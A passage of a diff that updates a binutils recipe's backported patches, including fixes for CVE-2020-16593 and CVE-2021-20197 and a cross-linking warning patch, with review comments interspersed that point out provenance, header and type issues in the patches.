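+ rettype = debug_make_int_type (dhandle, 4, FALSE);
+ break;
+- case 16:
++ case 15:
+ name = "boolean";
+ rettype = debug_make_bool_type (dhandle, 4);
+ break;
+- case 17:
++ case 16:
+ name = "short real";
+ rettype = debug_make_float_type (dhandle, 4);
+ break;
+- case 18:
++ case 17:
+ name = "real";
+ rettype = debug_make_float_type (dhandle, 8);
+ break;
+- case 19:
++ case 18:
+ /* FIXME */
+ name = "stringptr";
+ rettype = NULL;
+ break;
+- case 20:
++ case 19:
+ /* FIXME */
+ name = "character";
+ rettype = debug_make_int_type (dhandle, 1, TRUE);
+ break;
+- case 21:
++ case 20:
+ name = "logical*1";
+ rettype = debug_make_bool_type (dhandle, 1);
+ break;
+- case 22:
++ case 21:
+ name = "logical*2";
+ rettype = debug_make_bool_type (dhandle, 2);
+ break;
+- case 23:
++ case 22:
+ name = "logical*4";
+ rettype = debug_make_bool_type (dhandle, 4);
+ break;
+- case 24:
++ case 23:
+ name = "logical";
+ rettype = debug_make_bool_type (dhandle, 4);
+ break;
+- case 25:
++ case 24:
+ /* Complex type consisting of two IEEE single precision values. */
+ name = "complex";
+ rettype = debug_make_complex_type (dhandle, 8);
+ break;
+- case 26:
++ case 25:
+ /* Complex type consisting of two IEEE double precision values. */
+ name = "double complex";
+ rettype = debug_make_complex_type (dhandle, 16);
+ break;
+- case 27:
++ case 26:
+ name = "integer*1";
+ rettype = debug_make_int_type (dhandle, 1, FALSE);
+ break;
+- case 28:
++ case 27:
+ name = "integer*2";
+ rettype = debug_make_int_type (dhandle, 2, FALSE);
+ break;
+- case 29:
++ case 28:
+ name = "integer*4";
+ rettype = debug_make_int_type (dhandle, 4, FALSE);
+ break;
+- case 30:
++ case 29:
+ /* FIXME */
+ name = "wchar";
+ rettype = debug_make_int_type (dhandle, 2, FALSE);
+ break;
+- case 31:
++ case 30:
+ name = "long long";
+ rettype = debug_make_int_type (dhandle, 8, FALSE);
+ break;
+- case 32:
++ case 31:
+ name = "unsigned long long";
+ rettype = debug_make_int_type (dhandle, 8, TRUE);
+ break;
+- case 33:
++ case 32:
+ name = "logical*8";
+ rettype = debug_make_bool_type (dhandle, 8);
+ break;
+- case 34:
++ case 33:
+ name = "integer*8";
+ rettype = debug_make_int_type (dhandle, 8, FALSE);
+ break;
+@@ -3664,9 +3665,7 @@ stab_xcoff_builtin_type (void *dhandle, struct stab_handle *info,
+ }
+
+ rettype = debug_name_type (dhandle, name, rettype);
+-
+- info->xcoff_types[-typenum] = rettype;
+-
++ info->xcoff_types[typenum] = rettype;
+ return rettype;
+ }
+
+--
+2.27.0
+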
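Review bot: The diagnostic in the rewritten bounds check passes an unsigned expression to a `%d` conversion: `fprintf (stderr, _("Unrecognized XCOFF type %d\n"), -typenum - 1);`. Once `typenum = -typenum - 1` has run the variable is `unsigned int`, so printing the original negative type number relies on an implicit reinterpretation; `(int) (-typenum - 1)` would state the intent, at the cost of carrying a delta against the upstream commit. The out-of-bounds fix also depends on every caller still handing the negative type number to the new `unsigned int` parameter, and those call sites are outside the hunks shown, so they should be checked against this branch's `stabs.c` when the backport is applied. The end of the `switch` falls between the second and third hunk and is not visible here.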
diff --git a/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch b/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch
index 11a8110d40..88cce49e46 100644
--- a/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch
+++ b/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch
@@ -1,4 +1,4 @@
1From 7b24f81e04c9d00d96de7dbd250beade6d2c6e44 Mon Sep 17 00:00:00 2001 1From 12b658c0fe5771d16067baef933b7f34ed455def Mon Sep 17 00:00:00 2001
2From: Khem Raj <raj.khem@gmail.com> 2From: Khem Raj <raj.khem@gmail.com>
3Date: Fri, 15 Jan 2016 06:31:09 +0000 3Date: Fri, 15 Jan 2016 06:31:09 +0000
4Subject: [PATCH] warn for uses of system directories when cross linking 4Subject: [PATCH] warn for uses of system directories when cross linking
@@ -59,8 +59,8 @@ Signed-off-by: Khem Raj <raj.khem@gmail.com>
59 ld/ldfile.c | 17 +++++++++++++++++ 59 ld/ldfile.c | 17 +++++++++++++++++
60 ld/ldlex.h | 2 ++ 60 ld/ldlex.h | 2 ++
61 ld/ldmain.c | 2 ++ 61 ld/ldmain.c | 2 ++
62 ld/lexsup.c | 15 +++++++++++++++ 62 ld/lexsup.c | 16 ++++++++++++++++
63 9 files changed, 85 insertions(+) 63 9 files changed, 86 insertions(+)
64 64
65diff --git a/ld/config.in b/ld/config.in 65diff --git a/ld/config.in b/ld/config.in
66index d93c9b0830..5da2742bea 100644 66index d93c9b0830..5da2742bea 100644
@@ -77,10 +77,10 @@ index d93c9b0830..5da2742bea 100644
77 #undef EXTRA_SHLIB_EXTENSION 77 #undef EXTRA_SHLIB_EXTENSION
78 78
79diff --git a/ld/configure b/ld/configure 79diff --git a/ld/configure b/ld/configure
80index 811134a503..f8c17c19ae 100755 80index f432f4637d..a9da3c115e 100755
81--- a/ld/configure 81--- a/ld/configure
82+++ b/ld/configure 82+++ b/ld/configure
83@@ -826,6 +826,7 @@ with_lib_path 83@@ -830,6 +830,7 @@ with_lib_path
84 enable_targets 84 enable_targets
85 enable_64_bit_bfd 85 enable_64_bit_bfd
86 with_sysroot 86 with_sysroot
@@ -88,7 +88,7 @@ index 811134a503..f8c17c19ae 100755
88 enable_gold 88 enable_gold
89 enable_got 89 enable_got
90 enable_compressed_debug_sections 90 enable_compressed_debug_sections
91@@ -1491,6 +1492,8 @@ Optional Features: 91@@ -1495,6 +1496,8 @@ Optional Features:
92 --disable-largefile omit support for large files 92 --disable-largefile omit support for large files
93 --enable-targets alternative target configurations 93 --enable-targets alternative target configurations
94 --enable-64-bit-bfd 64-bit support (on hosts with narrower word sizes) 94 --enable-64-bit-bfd 64-bit support (on hosts with narrower word sizes)
@@ -97,7 +97,7 @@ index 811134a503..f8c17c19ae 100755
97 --enable-gold[=ARG] build gold [ARG={default,yes,no}] 97 --enable-gold[=ARG] build gold [ARG={default,yes,no}]
98 --enable-got=<type> GOT handling scheme (target, single, negative, 98 --enable-got=<type> GOT handling scheme (target, single, negative,
99 multigot) 99 multigot)
100@@ -15788,6 +15791,19 @@ fi 100@@ -16624,6 +16627,19 @@ fi
101 101
102 102
103 103
@@ -222,10 +222,10 @@ index 5287f19a7f..55096e4fc9 100644
222 222
223 /* The initial parser states. */ 223 /* The initial parser states. */
224diff --git a/ld/ldmain.c b/ld/ldmain.c 224diff --git a/ld/ldmain.c b/ld/ldmain.c
225index da1ad17763..12d0b07d8a 100644 225index c4af10f4e9..95b56b2d2d 100644
226--- a/ld/ldmain.c 226--- a/ld/ldmain.c
227+++ b/ld/ldmain.c 227+++ b/ld/ldmain.c
228@@ -274,6 +274,8 @@ main (int argc, char **argv) 228@@ -273,6 +273,8 @@ main (int argc, char **argv)
229 command_line.warn_mismatch = TRUE; 229 command_line.warn_mismatch = TRUE;
230 command_line.warn_search_mismatch = TRUE; 230 command_line.warn_search_mismatch = TRUE;
231 command_line.check_section_addresses = -1; 231 command_line.check_section_addresses = -1;
@@ -235,7 +235,7 @@ index da1ad17763..12d0b07d8a 100644
235 /* We initialize DEMANGLING based on the environment variable 235 /* We initialize DEMANGLING based on the environment variable
236 COLLECT_NO_DEMANGLE. The gcc collect2 program will demangle the 236 COLLECT_NO_DEMANGLE. The gcc collect2 program will demangle the
237diff --git a/ld/lexsup.c b/ld/lexsup.c 237diff --git a/ld/lexsup.c b/ld/lexsup.c
238index 3d15cc491d..0e8b4f2b7a 100644 238index 3d15cc491d..6478821443 100644
239--- a/ld/lexsup.c 239--- a/ld/lexsup.c
240+++ b/ld/lexsup.c 240+++ b/ld/lexsup.c
241@@ -550,6 +550,14 @@ static const struct ld_option ld_options[] = 241@@ -550,6 +550,14 @@ static const struct ld_option ld_options[] =
@@ -253,10 +253,10 @@ index 3d15cc491d..0e8b4f2b7a 100644
253 }; 253 };
254 254
255 #define OPTION_COUNT ARRAY_SIZE (ld_options) 255 #define OPTION_COUNT ARRAY_SIZE (ld_options)
256@@ -1603,6 +1611,13 @@ parse_args (unsigned argc, char **argv) 256@@ -1604,6 +1612,14 @@ parse_args (unsigned argc, char **argv)
257
258 case OPTION_PRINT_MAP_DISCARDED: 257 case OPTION_PRINT_MAP_DISCARDED:
259 config.print_map_discarded = TRUE; 258 config.print_map_discarded = TRUE;
259 break;
260+ 260+
261+ case OPTION_NO_POISON_SYSTEM_DIRECTORIES: 261+ case OPTION_NO_POISON_SYSTEM_DIRECTORIES:
262+ command_line.poison_system_directories = FALSE; 262+ command_line.poison_system_directories = FALSE;
@@ -264,6 +264,6 @@ index 3d15cc491d..0e8b4f2b7a 100644
264+ 264+
265+ case OPTION_ERROR_POISON_SYSTEM_DIRECTORIES: 265+ case OPTION_ERROR_POISON_SYSTEM_DIRECTORIES:
266+ command_line.error_poison_system_directories = TRUE; 266+ command_line.error_poison_system_directories = TRUE;
267 break; 267+ break;
268 } 268 }
269 } 269 }
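diff --git a/meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch b/meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch
new file mode 100644
index 0000000000..dc1e09d46b
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch
@@ -0,0 +1,32 @@
+From bf2252dca8c76e4c1f1c2dbf98dab7ffc9f5e5af Mon Sep 17 00:00:00 2001
+From: Nick Clifton <nickc@redhat.com>
+Date: Sat, 29 Aug 2020 08:03:15 +0100
+Subject: [PATCH] Include members in the variable table used when resolving
+ DW_AT_specification tags.
+
+ PR 26520
+ * dwarf2.c (scan_unit_for_symbols): Add member entries to the
+ variable table.
+
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=e6f04d55f681149a69102a73937d0987719c3f16]
+---
+ bfd/dwarf2.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/bfd/dwarf2.c b/bfd/dwarf2.c
+index dd3568a8532..ef2f6a3c63c 100644
+--- a/bfd/dwarf2.c
++++ b/bfd/dwarf2.c
+@@ -3248,7 +3248,8 @@ scan_unit_for_symbols (struct comp_unit *unit)
+ else
+ {
+ func = NULL;
+- if (abbrev->tag == DW_TAG_variable)
++ if (abbrev->tag == DW_TAG_variable
++ || abbrev->tag == DW_TAG_member)
+ {
+ bfd_size_type amt = sizeof (struct varinfo);
+ var = (struct varinfo *) bfd_zalloc (abfd, amt);
+--
+2.34.1
+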
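Review bot: The patch header stops at `Upstream-Status:` and has no `Signed-off-by:` line for whoever prepared the backport, unlike the other patch files added in this commit, so there is no record of who adapted it; a line of the form `Signed-off-by: <backporter name and address>` should be added. The hash on the `From` line (bf2252dc…) is not the one in the Upstream-Status URL (e6f04d55…), which suggests the file was exported from a local branch, and a short remark in the header saying so would make the provenance checkable. The added `|| abbrev->tag == DW_TAG_member` makes member DIEs allocate `varinfo` entries; the rest of `scan_unit_for_symbols` lies outside the hunk, so whether the later attribute handling is safe for member entries cannot be confirmed from here.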
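diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch b/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch
new file mode 100644
index 0000000000..c7c7829261
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch
@@ -0,0 +1,204 @@
+From aec72fda3b320c36eb99fc1c4cf95b10fc026729 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Thu, 16 Apr 2020 17:49:38 +0930
+Subject: [PATCH] PR25827, Null pointer dereferencing in scan_unit_for_symbols
+
+ PR 25827
+ * dwarf2.c (scan_unit_for_symbols): Wrap overlong lines. Don't
+ strdup(0).
+
+Upstream-Status: Backport
+https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=aec72fda3b320c36eb99fc1c4cf95b10fc026729
+CVE: CVE-2020-16593
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+
+Index: git/bfd/dwarf2.c
+===================================================================
+--- git.orig/bfd/dwarf2.c
++++ git/bfd/dwarf2.c
+@@ -295,12 +295,12 @@ struct comp_unit
+ /* This data structure holds the information of an abbrev. */
+ struct abbrev_info
+ {
+- unsigned int number; /* Number identifying abbrev. */
+- enum dwarf_tag tag; /* DWARF tag. */
+- int has_children; /* Boolean. */
+- unsigned int num_attrs; /* Number of attributes. */
+- struct attr_abbrev *attrs; /* An array of attribute descriptions. */
+- struct abbrev_info *next; /* Next in chain. */
++ unsigned int number; /* Number identifying abbrev. */
++ enum dwarf_tag tag; /* DWARF tag. */
++ bfd_boolean has_children; /* TRUE if the abbrev has children. */
++ unsigned int num_attrs; /* Number of attributes. */
++ struct attr_abbrev * attrs; /* An array of attribute descriptions. */
++ struct abbrev_info * next; /* Next in chain. */
+ };
+
+ struct attr_abbrev
+@@ -1487,6 +1487,8 @@ struct varinfo
+ {
+ /* Pointer to previous variable in list of all variables */
+ struct varinfo *prev_var;
++ /* The offset of the varinfo from the start of the unit. */
++ bfd_uint64_t unit_offset;
+ /* Source location file name */
+ char *file;
+ /* Source location line number */
+@@ -1497,7 +1499,7 @@ struct varinfo
+ /* Where the symbol is defined */
+ asection *sec;
+ /* Is this a stack variable? */
+- unsigned int stack: 1;
++ bfd_boolean stack;
+ };
+
+ /* Return TRUE if NEW_LINE should sort after LINE. */
+@@ -2871,7 +2873,7 @@ lookup_symbol_in_variable_table (struct
+ struct varinfo* each;
+
+ for (each = unit->variable_table; each; each = each->prev_var)
+- if (each->stack == 0
++ if (! each->stack
+ && each->file != NULL
+ && each->name != NULL
+ && each->addr == addr
+@@ -3166,6 +3168,20 @@ read_rangelist (struct comp_unit *unit,
+ return TRUE;
+ }
+
++static struct varinfo *
++lookup_var_by_offset (bfd_uint64_t offset, struct varinfo * table)
++{
++ while (table)
++ {
++ if (table->unit_offset == offset)
++ return table;
++ table = table->prev_var;
++ }
++
++ return NULL;
++}
++
++
+ /* DWARF2 Compilation unit functions. */
+
+ /* Scan over each die in a comp. unit looking for functions to add
+@@ -3202,6 +3218,9 @@ scan_unit_for_symbols (struct comp_unit
+ bfd_vma low_pc = 0;
+ bfd_vma high_pc = 0;
+ bfd_boolean high_pc_relative = FALSE;
++ bfd_uint64_t current_offset;
++
++ current_offset = info_ptr - unit->info_ptr_unit;
+
+ /* PR 17512: file: 9f405d9d. */
+ if (info_ptr >= info_ptr_end)
+@@ -3234,12 +3253,13 @@ scan_unit_for_symbols (struct comp_unit
+ goto fail;
+ }
+
+- var = NULL;
+ if (abbrev->tag == DW_TAG_subprogram
+ || abbrev->tag == DW_TAG_entry_point
+ || abbrev->tag == DW_TAG_inlined_subroutine)
+ {
+ bfd_size_type amt = sizeof (struct funcinfo);
++
++ var = NULL;
+ func = (struct funcinfo *) bfd_zalloc (abfd, amt);
+ if (func == NULL)
+ goto fail;
+@@ -3268,13 +3288,15 @@ scan_unit_for_symbols (struct comp_unit
+ if (var == NULL)
+ goto fail;
+ var->tag = abbrev->tag;
+- var->stack = 1;
++ var->stack = TRUE;
+ var->prev_var = unit->variable_table;
+ unit->variable_table = var;
++ var->unit_offset = current_offset;
+ /* PR 18205: Missing debug information can cause this
+ var to be attached to an already cached unit. */
+ }
+-
++ else
++ var = NULL;
+ /* No inline function in scope at this nesting level. */
+ nested_funcs[nesting_level].func = 0;
+ }
+@@ -3362,6 +3384,33 @@ scan_unit_for_symbols (struct comp_unit
+ {
+ switch (attr.name)
+ {
++ case DW_AT_specification:
++ if (attr.u.val)
++ {
++ struct varinfo * spec_var;
++
++ spec_var = lookup_var_by_offset (attr.u.val,
++ unit->variable_table);
++ if (spec_var == NULL)
++ {
++ _bfd_error_handler (_("DWARF error: could not find "
++ "variable specification "
++ "at offset %lx"),
++ (unsigned long) attr.u.val);
++ break;
++ }
++
++ if (var->name == NULL)
++ var->name = spec_var->name;
++ if (var->file == NULL && spec_var->file != NULL)
++ var->file = strdup (spec_var->file);
++ if (var->line == 0)
++ var->line = spec_var->line;
++ if (var->sec == NULL)
++ var->sec = spec_var->sec;
++ }
++ break;
++
+ case DW_AT_name:
+ if (is_str_attr (attr.form))
+ var->name = attr.u.str;
+@@ -3378,7 +3427,7 @@ scan_unit_for_symbols (struct comp_unit
+
+ case DW_AT_external:
+ if (attr.u.val != 0)
+- var->stack = 0;
++ var->stack = FALSE;
+ break;
+
+ case DW_AT_location:
+@@ -3392,7 +3441,7 @@ scan_unit_for_symbols (struct comp_unit
+ if (attr.u.blk->data != NULL
+ && *attr.u.blk->data == DW_OP_addr)
+ {
+- var->stack = 0;
++ var->stack = FALSE;
+
+ /* Verify that DW_OP_addr is the only opcode in the
+ location, in which case the block size will be 1
+@@ -3888,7 +3937,7 @@ comp_unit_hash_info (struct dwarf2_debug
+ each_var = each_var->prev_var)
+ {
+ /* Skip stack vars and vars with no files or names. */
+- if (each_var->stack == 0
++ if (! each_var->stack
+ && each_var->file != NULL
+ && each_var->name != NULL)
+ /* There is no need to copy name string into hash table as
+Index: git/bfd/ChangeLog
+===================================================================
+--- git.orig/bfd/ChangeLog
++++ git/bfd/ChangeLog
+@@ -1,3 +1,9 @@
++2020-04-16 Alan Modra <amodra@gmail.com>
++
++ PR 25827
++ * dwarf2.c (scan_unit_for_symbols): Wrap overlong lines. Don't
++ strdup(0).
++
+ 2021-05-03 Alan Modra <amodra@gmail.com>
+
+ PR 27755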
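Review bot: The header describes this patch as "Wrap overlong lines. Don't strdup(0)", yet the hunks also add `lookup_var_by_offset`, the `unit_offset` field in `struct varinfo` and an entire `DW_AT_specification` case, so the file tagged `CVE: CVE-2020-16593` carries more than its description accounts for. The header should say that a prerequisite change is folded in and name its upstream commit, or the prerequisite should be a separate patch, so the CVE fix can be compared with upstream line for line. Inside the new case, `attr.u.val` is matched against the unit-relative `unit_offset` without consulting `attr.form`, and the result of `strdup (spec_var->file)` is stored unchecked; both are presumably inherited from upstream but should be confirmed. The `bfd/ChangeLog` hunk uses an entry dated 2021-05-03 as context, so the patch applies only after whichever earlier patch in `SRC_URI` added that entry, which makes the ordering fragile.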
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch
new file mode 100644
index 0000000000..423814f98d
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch
@@ -0,0 +1,572 @@
1From d3edaa91d4cf7202ec14342410194841e2f67f12 Mon Sep 17 00:00:00 2001
2From: Alan Modra <amodra@gmail.com>
3Date: Fri, 26 Feb 2021 11:30:32 +1030
4Subject: [PATCH v2] Reinstate various pieces backed out from smart_rename changes
5
6In the interests of a stable release various last minute smart_rename
7patches were backed out of the 2.36 branch. The main reason to
8reinstate some of those backed out changes here is to make necessary
9followup fixes to commit 8e03235147a9 simple cherry-picks from
10mainline. A secondary reason is that ar -M support isn't fixed for
11pr26945 without this patch.
12
13 PR 26945
14 * ar.c: Don't include libbfd.h.
15 (write_archive): Replace xmalloc+strcpy with xstrdup.
16 * arsup.c (temp_name, real_ofd): New static variables.
17 (ar_open): Use make_tempname and bfd_fdopenw.
18 (ar_save): Adjust to suit ar_open changes.
19 * objcopy.c: Don't include libbfd.h.
20 * rename.c: Rename and reorder variables.
21
22(cherry picked from commit 95b91a043aeaeb546d2fea556d84a2de1e917770)
23
24Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=d3edaa91d4cf7202ec14342410194841e2f67f12]
25CVE: CVE-2021-20197
26Signed-off-by: Vinay Kumar <vinay.m.engg@gmail.com>
27---
28 bfd/bfd-in2.h | 2 +
29 bfd/opncls.c | 33 ++++++++++
30 binutils/ar.c | 15 +++--
31 binutils/arsup.c | 37 ++++++++----
32 binutils/bucomm.c | 4 +-
33 binutils/bucomm.h | 5 +-
34 binutils/objcopy.c | 37 +++++++-----
35 binutils/rename.c | 148 +++++++++++----------------------------------
36 8 files changed, 133 insertions(+), 148 deletions(-)
37
38diff --git a/bfd/bfd-in2.h b/bfd/bfd-in2.h
39index 2e453c50c18..e53f54a8ab7 100644
40--- a/bfd/bfd-in2.h
41+++ b/bfd/bfd-in2.h
42@@ -588,6 +588,8 @@ bfd *bfd_openr (const char *filename, const char *target);
43
44 bfd *bfd_fdopenr (const char *filename, const char *target, int fd);
45
46+bfd *bfd_fdopenw (const char *filename, const char *target, int fd);
47+
48 bfd *bfd_openstreamr (const char * filename, const char * target,
49 void * stream);
50
51diff --git a/bfd/opncls.c b/bfd/opncls.c
52index a03ad51c8fa..f9da97ed710 100644
53--- a/bfd/opncls.c
54+++ b/bfd/opncls.c
55@@ -370,6 +370,39 @@ bfd_fdopenr (const char *filename, const char *target, int fd)
56 return bfd_fopen (filename, target, mode, fd);
57 }
58
59+/*
60+FUNCTION
61+ bfd_fdopenw
62+
63+SYNOPSIS
64+ bfd *bfd_fdopenw (const char *filename, const char *target, int fd);
65+
66+DESCRIPTION
67+ <<bfd_fdopenw>> is exactly like <<bfd_fdopenr>> with the exception that
68+ the resulting BFD is suitable for output.
69+*/
70+
71+bfd *
72+bfd_fdopenw (const char *filename, const char *target, int fd)
73+{
74+ bfd *out = bfd_fdopenr (filename, target, fd);
75+
76+ if (out != NULL)
77+ {
78+ if (!bfd_write_p (out))
79+ {
80+ close (fd);
81+ _bfd_delete_bfd (out);
82+ out = NULL;
83+ bfd_set_error (bfd_error_invalid_operation);
84+ }
85+ else
86+ out->direction = write_direction;
87+ }
88+
89+ return out;
90+}
91+
92 /*
93 FUNCTION
94 bfd_openstreamr
95diff --git a/binutils/ar.c b/binutils/ar.c
96index 1057db9980e..c33a11e0d70 100644
97--- a/binutils/ar.c
98+++ b/binutils/ar.c
99@@ -1195,20 +1195,23 @@ write_archive (bfd *iarch)
100 bfd *obfd;
101 char *old_name, *new_name;
102 bfd *contents_head = iarch->archive_next;
103+ int ofd = -1;
104
105- old_name = (char *) xmalloc (strlen (bfd_get_filename (iarch)) + 1);
106- strcpy (old_name, bfd_get_filename (iarch));
107- new_name = make_tempname (old_name);
108+ old_name = xstrdup (bfd_get_filename (iarch));
109+ new_name = make_tempname (old_name, &ofd);
110
111 if (new_name == NULL)
112 bfd_fatal (_("could not create temporary file whilst writing archive"));
113
114 output_filename = new_name;
115
116- obfd = bfd_openw (new_name, bfd_get_target (iarch));
117+ obfd = bfd_fdopenw (new_name, bfd_get_target (iarch), ofd);
118
119 if (obfd == NULL)
120- bfd_fatal (old_name);
121+ {
122+ close (ofd);
123+ bfd_fatal (old_name);
124+ }
125
126 output_bfd = obfd;
127
128@@ -1246,7 +1249,7 @@ write_archive (bfd *iarch)
129 /* We don't care if this fails; we might be creating the archive. */
130 bfd_close (iarch);
131
132- if (smart_rename (new_name, old_name, 0) != 0)
133+ if (smart_rename (new_name, old_name, NULL) != 0)
134 xexit (1);
135 free (old_name);
136 free (new_name);
137diff --git a/binutils/arsup.c b/binutils/arsup.c
138index 00967c972cd..b8ae4f7ec1a 100644
139--- a/binutils/arsup.c
140+++ b/binutils/arsup.c
141@@ -42,6 +42,8 @@ extern int deterministic;
142
143 static bfd *obfd;
144 static char *real_name;
145+static char *temp_name;
146+static int real_ofd;
147 static FILE *outfile;
148
149 static void
150@@ -149,27 +151,24 @@ maybequit (void)
151 void
152 ar_open (char *name, int t)
153 {
154- char *tname;
155- const char *bname = lbasename (name);
156- real_name = name;
157+ real_name = xstrdup (name);
158+ temp_name = make_tempname (real_name, &real_ofd);
159
160- /* Prepend tmp- to the beginning, to avoid file-name clashes after
161- truncation on filesystems with limited namespaces (DOS). */
162- if (asprintf (&tname, "%.*stmp-%s", (int) (bname - name), name, bname) == -1)
163+ if (temp_name == NULL)
164 {
165- fprintf (stderr, _("%s: Can't allocate memory for temp name (%s)\n"),
166+ fprintf (stderr, _("%s: Can't open temporary file (%s)\n"),
167 program_name, strerror(errno));
168 maybequit ();
169 return;
170 }
171
172- obfd = bfd_openw (tname, NULL);
173+ obfd = bfd_fdopenw (temp_name, NULL, real_ofd);
174
175 if (!obfd)
176 {
177 fprintf (stderr,
178 _("%s: Can't open output archive %s\n"),
179- program_name, tname);
180+ program_name, temp_name);
181
182 maybequit ();
183 }
184@@ -344,16 +343,30 @@ ar_save (void)
185 }
186 else
187 {
188- char *ofilename = xstrdup (bfd_get_filename (obfd));
189+ struct stat target_stat;
190
191 if (deterministic > 0)
192 obfd->flags |= BFD_DETERMINISTIC_OUTPUT;
193
194 bfd_close (obfd);
195
196- smart_rename (ofilename, real_name, 0);
197+ if (stat (real_name, &target_stat) != 0)
198+ {
199+ /* The temp file created in ar_open has mode 0600 as per mkstemp.
200+ Create the real empty output file here so smart_rename will
201+ update the mode according to the process umask. */
202+ obfd = bfd_openw (real_name, NULL);
203+ if (obfd != NULL)
204+ {
205+ bfd_set_format (obfd, bfd_archive);
206+ bfd_close (obfd);
207+ }
208+ }
209+
210+ smart_rename (temp_name, real_name, NULL);
211 obfd = 0;
212- free (ofilename);
213+ free (temp_name);
214+ free (real_name);
215 }
216 }
217
218diff --git a/binutils/bucomm.c b/binutils/bucomm.c
219index 9e6a02843e6..53244201f89 100644
220--- a/binutils/bucomm.c
221+++ b/binutils/bucomm.c
222@@ -532,7 +532,7 @@ template_in_dir (const char *path)
223 as FILENAME. */
224
225 char *
226-make_tempname (const char *filename)
227+make_tempname (const char *filename, int *ofd)
228 {
229 char *tmpname = template_in_dir (filename);
230 int fd;
231@@ -550,7 +550,7 @@ make_tempname (const char *filename)
232 free (tmpname);
233 return NULL;
234 }
235- close (fd);
236+ *ofd = fd;
237 return tmpname;
238 }
239
240diff --git a/binutils/bucomm.h b/binutils/bucomm.h
241index d8318343f78..2b164e0af68 100644
242--- a/binutils/bucomm.h
243+++ b/binutils/bucomm.h
244@@ -51,7 +51,7 @@ int display_info (void);
245
246 void print_arelt_descr (FILE *, bfd *, bfd_boolean, bfd_boolean);
247
248-char *make_tempname (const char *);
249+char *make_tempname (const char *, int *);
250 char *make_tempdir (const char *);
251
252 bfd_vma parse_vma (const char *, const char *);
253@@ -71,7 +71,8 @@ extern void print_version (const char *);
254 /* In rename.c. */
255 extern void set_times (const char *, const struct stat *);
256
257-extern int smart_rename (const char *, const char *, int);
258+extern int smart_rename (const char *, const char *, struct stat *);
259+
260
261 /* In libiberty. */
262 void *xmalloc (size_t);
263diff --git a/binutils/objcopy.c b/binutils/objcopy.c
264index 212e25144e6..5ccbd926610 100644
265--- a/binutils/objcopy.c
266+++ b/binutils/objcopy.c
267@@ -3682,7 +3682,7 @@ set_long_section_mode (bfd *output_bfd, bfd *input_bfd, enum long_section_name_h
268 /* The top-level control. */
269
270 static void
271-copy_file (const char *input_filename, const char *output_filename,
272+copy_file (const char *input_filename, const char *output_filename, int ofd,
273 const char *input_target, const char *output_target,
274 const bfd_arch_info_type *input_arch)
275 {
276@@ -3757,9 +3757,14 @@ copy_file (const char *input_filename, const char *output_filename,
277 else
278 force_output_target = TRUE;
279
280- obfd = bfd_openw (output_filename, output_target);
281+ if (ofd >= 0)
282+ obfd = bfd_fdopenw (output_filename, output_target, ofd);
283+ else
284+ obfd = bfd_openw (output_filename, output_target);
285+
286 if (obfd == NULL)
287 {
288+ close (ofd);
289 bfd_nonfatal_message (output_filename, NULL, NULL, NULL);
290 status = 1;
291 return;
292@@ -3787,13 +3792,19 @@ copy_file (const char *input_filename, const char *output_filename,
293 if (output_target == NULL)
294 output_target = bfd_get_target (ibfd);
295
296- obfd = bfd_openw (output_filename, output_target);
297+ if (ofd >= 0)
298+ obfd = bfd_fdopenw (output_filename, output_target, ofd);
299+ else
300+ obfd = bfd_openw (output_filename, output_target);
301+
302 if (obfd == NULL)
303 {
304+ close (ofd);
305 bfd_nonfatal_message (output_filename, NULL, NULL, NULL);
306 status = 1;
307 return;
308 }
309+
310 /* This is a no-op on non-Coff targets. */
311 set_long_section_mode (obfd, ibfd, long_section_names);
312
313@@ -4746,6 +4757,7 @@ strip_main (int argc, char *argv[])
314 int hold_status = status;
315 struct stat statbuf;
316 char *tmpname;
317+ int tmpfd = -1;
318
319 if (get_file_size (argv[i]) < 1)
320 {
321@@ -4760,7 +4772,7 @@ strip_main (int argc, char *argv[])
322
323 if (output_file == NULL
324 || filename_cmp (argv[i], output_file) == 0)
325- tmpname = make_tempname (argv[i]);
326+ tmpname = make_tempname (argv[i], &tmpfd);
327 else
328 tmpname = output_file;
329
330@@ -4773,15 +4785,13 @@ strip_main (int argc, char *argv[])
331 }
332
333 status = 0;
334- copy_file (argv[i], tmpname, input_target, output_target, NULL);
335+ copy_file (argv[i], tmpname, tmpfd, input_target, output_target, NULL);
336 if (status == 0)
337 {
338- if (preserve_dates)
339- set_times (tmpname, &statbuf);
340 if (output_file != tmpname)
341 status = (smart_rename (tmpname,
342 output_file ? output_file : argv[i],
343- preserve_dates) != 0);
344+ preserve_dates ? &statbuf : NULL) != 0);
345 if (status == 0)
346 status = hold_status;
347 }
348@@ -4993,7 +5003,7 @@ copy_main (int argc, char *argv[])
349 bfd_boolean formats_info = FALSE;
350 bfd_boolean use_globalize = FALSE;
351 bfd_boolean use_keep_global = FALSE;
352- int c;
353+ int c, tmpfd = -1;
354 struct stat statbuf;
355 const bfd_arch_info_type *input_arch = NULL;
356
357@@ -5839,7 +5849,7 @@ copy_main (int argc, char *argv[])
358 are the same, then create a temp and rename the result into the input. */
359 if (output_filename == NULL
360 || filename_cmp (input_filename, output_filename) == 0)
361- tmpname = make_tempname (input_filename);
